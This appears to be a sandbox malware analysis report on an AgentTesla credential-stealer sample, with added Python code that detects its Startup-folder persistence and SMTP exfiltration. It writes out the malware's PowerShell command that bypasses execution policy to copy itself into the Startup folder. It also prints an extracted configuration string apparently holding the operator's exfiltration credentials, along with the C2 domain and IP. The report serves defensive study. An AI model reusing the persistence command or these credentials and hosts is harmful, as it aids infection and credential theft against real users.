
Analysis Report NKPhba0VZI.exe

Overview

General Information

Sample Name: NKPhba0VZI.exe
Analysis ID: 358333
MD5: 3a89cf2d6d2449ef1a9640af29f3a782
SHA1: 220b9c5b4c7e9de15753f629da1ac3a075dc0800
SHA256: 3d652eb897291f8eb2fe8f9374007388b0cd426a797de77545b82a325dde762a
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Bypasses PowerShell execution policy
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected Beds Obfuscator
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • NKPhba0VZI.exe (PID: 6112 cmdline: 'C:\Users\user\Desktop\NKPhba0VZI.exe' MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
    • powershell.exe (PID: 2576 cmdline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • NKPhba0VZI.exe (PID: 6064 cmdline: C:\Users\user\Desktop\NKPhba0VZI.exe MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
  • Drivers.exe (PID: 6520 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
    • powershell.exe (PID: 6716 cmdline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Drivers.exe (PID: 6980 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
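The process tree above is the whole persistence chain in one picture: the sample spawns PowerShell with -ExecutionPolicy Bypass to copy itself into the per-user Startup folder as Drivers.exe, then re-launches its own image (the "Creates a process in suspended mode" signature and the RunPE.pdb string further down suggest the unpacked payload is injected into that child). The following detection logic is an added example, not part of the Joe Sandbox report. The events are constructed from the tree above with the PIDs and command lines as listed; the event field names, the parent PID 1000 given to the root processes, and the benign control event are assumptions.

```python
"""Flag the Startup-folder persistence and self-re-execution pattern seen
in this report's process tree.

Added example, not part of the Joe Sandbox report. The events below are
constructed from the report's process tree (PIDs and command lines as
listed there); the field layout mimics a Sysmon Event ID 1 export and is
an assumption, not a real log format.
"""
import re
from dataclasses import dataclass

# Per-user Startup folder, as it appears in the report's command lines.
STARTUP_DIR_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.IGNORECASE
)
PS_BYPASS_RE = re.compile(r"-ExecutionPolicy\s+Bypass", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's Startup tree (PIDs match the report);
# ppid 1000 for the root process and the last, benign event are assumed.
EVENTS = [
    ProcEvent(6112, 1000, r"C:\Users\user\Desktop\NKPhba0VZI.exe",
              r"'C:\Users\user\Desktop\NKPhba0VZI.exe'"),
    ProcEvent(2576, 6112, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item "
              r"'C:\Users\user\Desktop\NKPhba0VZI.exe' "
              r"'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'"),
    ProcEvent(5928, 2576, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(6064, 6112, r"C:\Users\user\Desktop\NKPhba0VZI.exe",
              r"C:\Users\user\Desktop\NKPhba0VZI.exe"),
    # Benign control: a file copy with the default execution policy.
    ProcEvent(7000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -command Copy-Item 'C:\tmp\a.txt' 'C:\tmp\b.txt'"),
]


def is_powershell(image: str) -> bool:
    return image.lower().endswith("\\powershell.exe")


def detect_startup_drop(events):
    """PIDs of PowerShell instances started with -ExecutionPolicy Bypass
    whose command line writes into the Startup folder (the persistence step)."""
    return [
        e.pid for e in events
        if is_powershell(e.image)
        and PS_BYPASS_RE.search(e.cmdline)
        and STARTUP_DIR_RE.search(e.cmdline)
    ]


def detect_self_reexec(events):
    """(parent, child) pairs where a process spawns a child from its own
    image path. When the child is created suspended and injected into, its
    on-disk image says nothing about the code that actually runs."""
    by_pid = {e.pid: e for e in events}
    return [
        (e.ppid, e.pid) for e in events
        if e.ppid in by_pid
        and by_pid[e.ppid].image.lower() == e.image.lower()
    ]


def detect_chain(events):
    """Parents that both persisted via the Startup folder and re-launched
    their own image: the combination is far rarer than either alone."""
    by_pid = {e.pid: e for e in events}
    droppers = {by_pid[p].ppid for p in detect_startup_drop(events)}
    reexec_parents = {ppid for ppid, _ in detect_self_reexec(events)}
    return sorted(droppers & reexec_parents)


if __name__ == "__main__":
    print("Startup drop via PowerShell:", detect_startup_drop(EVENTS))
    print("self re-execution:", detect_self_reexec(EVENTS))
    print("full chain parents:", detect_chain(EVENTS))
```

Run on the constructed events, detect_startup_drop returns the PowerShell PID 2576, detect_self_reexec returns (6112, 6064), and detect_chain narrows the alert to the original sample's PID 6112. The same three checks applied to the Drivers.exe subtree (PIDs 6520, 6716, 6980) would fire again, which is the autostart copy re-establishing itself after logon.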

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "FTP Info": "th3books@nobettwo.xyzK]Za#W.$sattnobettwo.xyz"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000A.00000002.301353554.0000000005100000.00000004.00000001.sdmp | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security
0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(17 entries in the full report; first 5 shown)

Unpacked PEs

Source | Rule | Description | Author
5.2.NKPhba0VZI.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.2.NKPhba0VZI.exe.56b0000.7.raw.unpack | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security
20.2.Drivers.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.2.NKPhba0VZI.exe.4125d70.3.unpack | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security
10.2.Drivers.exe.3b9f940.4.unpack | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security
(17 entries in the full report; first 5 shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 10.2.Drivers.exe.3ca23b8.6.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "FTP Info": "th3books@nobettwo.xyzK]Za#W.$sattnobettwo.xyz"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | ReversingLabs: Detection: 26%
Multi AV Scanner detection for submitted file
Source: NKPhba0VZI.exe | ReversingLabs: Detection: 26%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: NKPhba0VZI.exe | Joe Sandbox ML: detected
Source: 20.2.Drivers.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.2.NKPhba0VZI.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8

Compliance:

Uses 32bit PE files
Source: NKPhba0VZI.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: NKPhba0VZI.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: RunPE.pdb source: NKPhba0VZI.exe, 00000001.00000002.209196388.0000000003051000.00000004.00000001.sdmp, Drivers.exe, 0000000A.00000002.296374394.0000000002B68000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49737 -> 198.54.126.101:587
Source: global traffic | TCP traffic: 192.168.2.3:49737 -> 198.54.126.101:587
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: unknown | DNS traffic detected: queries for: nobettwo.xyz
Source: NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: NKPhba0VZI.exe, 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, Drivers.exe, 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp | String found in binary or memory: http://blog.naver.com/cubemit314Ghttp://projectofsonagi.tistory.com/
Source: powershell.exe, 00000002.00000002.277720910.00000000076B0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsoft.co
Source: NKPhba0VZI.exe, 00000005.00000002.478647044.0000000002F04000.00000004.00000001.sdmp | String found in binary or memory: http://nobettwo.xyz
Source: powershell.exe, 00000002.00000002.272085164.0000000005593000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | String found in binary or memory: http://oVNzXy.com
Source: powershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.267966815.0000000004531000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.371748819.0000000004C81000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%
Source: Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000003.262043012.00000000076F3000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.268161623.0000000004674000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.379255389.0000000007E33000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.372155180.0000000004DC3000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.272085164.0000000005593000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.376382490.0000000005CE5000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp | String found in binary or memory: https://pNaYvIZ26OfWPs.net
Source: NKPhba0VZI.exe, 00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmp, NKPhba0VZI.exe, 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmp, Drivers.exe, 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.463217997.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: NKPhba0VZI.exe, 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, Drivers.exe, 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: NKPhba0VZI.exe, 00000001.00000002.208702303.000000000136A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
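The Networking entries above record the exfiltration path end to end: a DNS lookup for nobettwo.xyz, then a TCP session from 192.168.2.3:49737 to 198.54.126.101:587 (the SMTP submission port), which is what Snort rule 2030171 fired on. Where only flow records exist (NetFlow or Zeek-style exports, no packet payload for an IDS signature), the same event can be surfaced by correlating a DNS answer with the outbound mail-port connection that follows it. The code below is an added example of that correlation and is not part of the Joe Sandbox report. Only the domain, the two endpoints and the port come from the report; the flow field layout, timestamps, the resolver address 192.168.2.1, the assumption that nobettwo.xyz resolved to 198.54.126.101, and the benign control flows are constructed.

```python
"""Correlate a DNS answer with a following outbound mail-port connection.

Added example, not part of the Joe Sandbox report. The flow records below
are constructed from the report's Networking section (nobettwo.xyz lookup,
192.168.2.3:49737 -> 198.54.126.101:587); the record layout, timestamps,
resolver address and control flows are assumptions.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional

# 25 = SMTP relay, 465 = implicit TLS submission, 587 = STARTTLS submission.
MAIL_PORTS = {25, 465, 587}
# A DNS answer older than this is not credited with producing a connection.
DNS_CORRELATION_WINDOW_S = 60.0


@dataclass(frozen=True)
class Flow:
    ts: float                         # seconds since capture start (assumed)
    proto: str                        # "udp" or "tcp"
    src: str
    sport: int
    dst: str
    dport: int
    dns_qname: Optional[str] = None   # set on DNS query records
    dns_answer: Optional[str] = None  # A record returned, if any


# Constructed: the report's lookup and SMTP session, plus control flows
# (a CRL fetch over HTTP and mail to an internal relay) that must not fire.
FLOWS = [
    Flow(10.0, "udp", "192.168.2.3", 51000, "192.168.2.1", 53,
         dns_qname="nobettwo.xyz", dns_answer="198.54.126.101"),
    Flow(10.4, "tcp", "192.168.2.3", 49737, "198.54.126.101", 587),
    Flow(20.0, "udp", "192.168.2.3", 51001, "192.168.2.1", 53,
         dns_qname="crl.microsoft.com", dns_answer="23.1.2.3"),
    Flow(20.2, "tcp", "192.168.2.3", 49738, "23.1.2.3", 80),
    Flow(30.0, "tcp", "192.168.2.3", 49739, "192.168.2.10", 587),
]


def is_external(ip: str) -> bool:
    """True for globally routable addresses; RFC 1918 and loopback are not."""
    return ipaddress.ip_address(ip).is_global


def resolved_name(flows, ip: str, before_ts: float) -> Optional[str]:
    """Most recent DNS answer for `ip` within the window ending at `before_ts`."""
    best = None
    for f in flows:
        if f.proto == "udp" and f.dport == 53 and f.dns_answer == ip:
            if 0 <= before_ts - f.ts <= DNS_CORRELATION_WINDOW_S:
                if best is None or f.ts > best.ts:
                    best = f
    return best.dns_qname if best else None


def smtp_exfil_candidates(flows):
    """Outbound TCP to a mail port on an external host, each paired with the
    DNS name that resolved to it (None when the IP was contacted directly,
    which on its own is worth a look for a host that is not a mail server)."""
    hits = []
    for f in flows:
        if f.proto != "tcp" or f.dport not in MAIL_PORTS:
            continue
        if not is_external(f.dst):
            continue  # mail to an internal relay is normal; tune per environment
        hits.append((f"{f.src}:{f.sport}", f"{f.dst}:{f.dport}",
                     resolved_name(flows, f.dst, f.ts)))
    return hits


if __name__ == "__main__":
    for hit in smtp_exfil_candidates(FLOWS):
        print("external mail-port egress:", hit)
```

On the constructed flows the only hit is 192.168.2.3:49737 to 198.54.126.101:587 tagged with nobettwo.xyz; the HTTP fetch and the connection to the internal relay are ignored. The external-address check is a deliberate starting point rather than a rule: hosts that legitimately talk to a cloud mail service on 587 need an allow-list of expected destinations, and a workstation contacting a freshly resolved domain on 587 is the shape of AgentTesla's SMTP exfil regardless of which IDS rules are deployed.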

System Summary:

Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Code functions: 1_2_01686C71, 1_2_01684FA0, 1_2_0168B980, 1_2_0168B990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07547EA0
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Code functions: 5_2_00D07880, 5_2_00D05010, 5_2_00D05E40, 5_2_00D09F3A, 5_2_00D031E0, 5_2_00D00460, 5_2_00D1D578, 5_2_00D1317E, 5_2_00D1EA08, 5_2_00D11FE0, 5_2_00D12768, 5_2_00D1BAB0, 5_2_011D5840, 5_2_011DBAC8, 5_2_011D6F60, 5_2_011F35C8, 5_2_011F0040, 5_2_011F4355, 5_2_011F7A40, 5_2_011FAD00, 5_2_011FED38, 5_2_011FADE1, 5_2_011F0E68, 5_2_05134772, 5_2_05133EA8, 5_2_05134827, 5_2_05133D4F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | Code functions: 10_2_02A74FB0, 10_2_02A76C80, 10_2_02A7B980, 10_2_02A7B990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code functions: 15_2_04C6D138, 15_2_04C6D1C3, 15_2_07F04AB8, 15_2_07F0AF18, 15_2_07F0AF07, 15_2_07F04AA9, 15_2_08049AD8, 15_2_080450C8, 15_2_0804C4A0, 15_2_0804AAD8, 15_2_08046B30, 15_2_080450BA, 15_2_08078AD0, 15_2_08070006, 15_2_08070040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | Code functions: 20_2_02CA4750, 20_2_02CA3D2C, 20_2_02CA81B9, 20_2_02CA4827, 20_2_02CA54D2, 20_2_02CA3D20
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe 3D652EB897291F8EB2FE8F9374007388B0CD426A797DE77545B82A325DDE762A
Source: NKPhba0VZI.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Drivers.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: NKPhba0VZI.exe, 00000001.00000002.209196388.0000000003051000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRunPE.dll" vs NKPhba0VZI.exe
Source: NKPhba0VZI.exe, 00000001.00000002.209196388.0000000003051000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameaGqFPgvIPMrNBrNVKGPQ.exe4 vs NKPhba0VZI.exe
Source: NKPhba0VZI.exe, 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCaptIt.dll. vs NKPhba0VZI.exe
Source: NKPhba0VZI.exe, 00000001.00000000.198462500.0000000000D53000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenpp.7.8.8.Installer.x64.exe4 vs NKPhba0VZI.exe
Source: NKPhba0VZI.exe, 00000001.00000002.208702303.000000000136A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs NKPhba0VZI.exe
Source: NKPhba0VZI.exe, 00000005.00000002.472734152.0000000001030000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs NKPhba0VZI.exe
Source: NKPhba0VZI.exe, 00000005.00000002.465383827.0000000000883000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenpp.7.8.8.Installer.x64.exe4 vs NKPhba0VZI.exe
Source: NKPhba0VZI.exe, 00000005.00000002.466697748.0000000000CF8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs NKPhba0VZI.exe
Source: NKPhba0VZI.exe, 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameaGqFPgvIPMrNBrNVKGPQ.exe4 vs NKPhba0VZI.exe
Source: NKPhba0VZI.exe, 00000005.00000002.467855777.0000000000D70000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx.mui vs NKPhba0VZI.exe
Source: NKPhba0VZI.exe | Binary or memory string: OriginalFilenamenpp.7.8.8.Installer.x64.exe4 vs NKPhba0VZI.exe
Source: NKPhba0VZI.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: NKPhba0VZI.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Drivers.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 1.0.NKPhba0VZI.exe.cd0000.0.unpack, pptfile.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.2.NKPhba0VZI.exe.cd0000.0.unpack, pptfile.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: Drivers.exe.2.dr, pptfile.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.NKPhba0VZI.exe.800000.1.unpack, pptfile.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@12/12@2/1
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NKPhba0VZI.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5urz4n2.cbm.ps1
Source: NKPhba0VZI.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: NKPhba0VZI.exe | ReversingLabs: Detection: 26%
Source: unknown | Process created: C:\Users\user\Desktop\NKPhba0VZI.exe 'C:\Users\user\Desktop\NKPhba0VZI.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\Desktop\NKPhba0VZI.exe C:\Users\user\Desktop\NKPhba0VZI.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
